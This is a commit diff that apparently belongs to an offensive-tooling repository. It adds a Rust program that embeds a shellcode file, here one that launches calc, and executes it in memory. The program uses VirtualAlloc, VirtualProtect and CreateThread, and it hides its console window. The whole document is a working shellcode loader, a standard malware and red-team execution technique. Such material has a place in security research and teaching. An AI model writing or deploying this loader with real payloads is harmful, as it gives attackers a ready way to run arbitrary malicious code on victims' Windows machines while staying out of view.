add create_thread

test · test · commit 5c3ff124b907 · 2023-03-21T07:02:39.000-07:00
diff --git a/create_thread/Cargo.toml b/create_thread/Cargo.toml
@@ -0,0 +1,9 @@
+[package]
+name = "create_thread"
+version = "0.1.0"
+edition = "2021"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+windows-sys = { version = "0.45.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_Security"] }
diff --git a/create_thread/src/main.rs b/create_thread/src/main.rs
@@ -0,0 +1,42 @@
+#![windows_subsystem = "windows"]
+
+use std::mem::transmute;
+use std::ptr::{copy, null, null_mut};
+use windows_sys::Win32::Foundation::{FALSE, WAIT_FAILED};
+use windows_sys::Win32::System::Memory::{
+    VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,
+};
+use windows_sys::Win32::System::Threading::{CreateThread, WaitForSingleObject};
+
+static SHELLCODE: [u8; 98] = *include_bytes!("../../w64-exec-calc-shellcode-func.bin");
+static SIZE: usize = SHELLCODE.len();
+
+fn main() {
+    let mut old = PAGE_READWRITE;
+
+    unsafe {
+        let dest = VirtualAlloc(null(), SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+        if dest == null_mut() {
+            eprintln!("VirtualAlloc failed!");
+            return;
+        }
+
+        copy(SHELLCODE.as_ptr(), dest as *mut u8, SIZE);
+
+        let res = VirtualProtect(dest, SIZE, PAGE_EXECUTE, &mut old);
+        if res == FALSE {
+            eprintln!("VirtualProtect failed!");
+            return;
+        }
+
+        let dest = transmute(dest);
+
+        let thread = CreateThread(null(), 0, dest, null(), 0, null_mut());
+        if thread == 0 {
+            eprintln!("CreateThread failed!");
+            return;
+        }
+
+        WaitForSingleObject(thread, WAIT_FAILED);
+    }
+}
